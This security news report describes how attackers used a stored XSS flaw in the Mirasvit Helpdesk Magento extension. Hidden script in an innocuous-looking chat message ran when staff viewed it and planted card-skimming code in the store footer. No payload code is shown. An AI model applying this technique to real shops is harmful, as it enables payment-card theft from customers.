Hackers are actively targeting Magento sites running a popular helpdesk extension, Dutch security researcher Willem de Groot has discovered.
The avenue for these attacks is a Magento extension named Mirasvit Helpdesk, which allows sites to show a "Chat with us" widget on Magento shops.
In September 2017, Hungarian security firm WebShield
published details about two vulnerabilities affecting the Mirasvit Helpdesk extension.
Experts warned that all versions of the Mirasvit Helpdesk extension released up to that point (until version 1.5.2) were vulnerable to these two flaws.
The first allowed attackers to upload files to the underlying Magento servers (CVE-2017-14320), while the second was a banal cross-site scripting (XSS) issue (CVE-2017-14321).
Chat widget used to infect stores with card stealer malware
Today, de Groot published the findings of his investigation of a hacked Magento store, and the security expert claims that hackers used the second flaw to breach Magento sites.
According to de Groot, attackers sent benign messages through the Mirasvit Helpdesk widget. The attacker entered malicious code containing the XSS payload in the chat window displayed on Magento stores, and the message was stored in the Magento database.
When support staff checked the recent messages in the store's backend, the malicious message was displayed as a benign text that read something like:
Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! – knockers@yahoo.com
The malicious code was not visible, but in reality, at the moment the store owner viewed this message, the payload already executed.
De Groot says the XSS payload inserted additional malicious code in the Magento store's footer section. This code would execute on all of the store's pages, and its role was to collect payment card data from the store's checkout process.
